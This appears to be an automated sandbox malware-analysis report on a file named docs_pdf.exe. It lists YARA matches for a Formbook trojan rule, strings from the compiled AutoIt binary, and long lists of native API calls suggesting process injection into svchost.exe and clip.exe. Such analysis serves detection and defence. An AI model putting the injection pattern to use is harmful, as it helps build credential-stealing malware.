Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_01010219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0103CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

            E-Banking Fraud

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: This is a third-party compiled AutoIt script. 0_2_00FB3B4C
Source: docs_pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: docs_pdf.exe, 00000000.00000000.1661626632.0000000001065000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_db17d7e8-1
Source: docs_pdf.exe, 00000000.00000000.1661626632.0000000001065000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_156f4d24-5
Source: docs_pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_cdddda69-0
Source: docs_pdf.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a38f168d-4
Source: initial sample | Static PE information: Filename: docs_pdf.exe
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042AFF3 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03474340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03474650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C4650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C4340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C39B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C3090 NtSetValueKey
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048C3D70 NtOpenThread
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_027A7B40 NtCreateFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_027A7E30 NtClose
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_027A7F90 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_027A7CA0 NtReadFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_027A7D90 NtDeleteFile
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_01014021: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_01008858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0101545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FBE800
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FDDBB5
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FBE060
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0103804A
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FC4140
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FD2405
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FE6522
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FE267E
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_01030665
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FC6843
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FD283A
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FE89DF
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0100EB07
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_01018B13
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FE6A94
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FC8A0E
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_01030AE2
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FDCD61
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FE7006
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FC3190
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FC710E
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FB1287
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FD33C7
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FDF419
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FD16C4
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FC5680
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FD78D3
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FC58C0
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FD1BB8
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FE9D05
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FBFE40
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FDBFE6
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00FD1FD0
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00F83600
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004011C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004021A5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004021B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FACB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FAD3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402320
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004023BC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042D443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416433
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FCF3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040DD73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402F50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345D2F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03485630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03403FD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03403FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFCF2
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe | Code function: 2_2_037D6115
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe | Code function: 2_2_037D8095
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe | Code function: 2_2_037F57E5
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe | Code function: 2_2_037DE7D5
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe | Code function: 2_2_037DE7D1
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe | Code function: 2_2_037D7E75
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe | Code function: 2_2_037D7E6D
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0493E4F6
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04934420
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04942446
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04950591
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04890535
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048AC6E0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0488C7C0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048B4750
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04890770
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04922000
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_049441A2
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_049501AA
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_049481CC
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04880100
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0492A118
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04918158
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_049102C0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04930274
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_049503E6
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0489E3F0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0494A352
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04930CB5
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04880CF2
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04890C00
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048A8DBF
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0488ADE0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0489AD00
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0492CD1F
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0494CE93
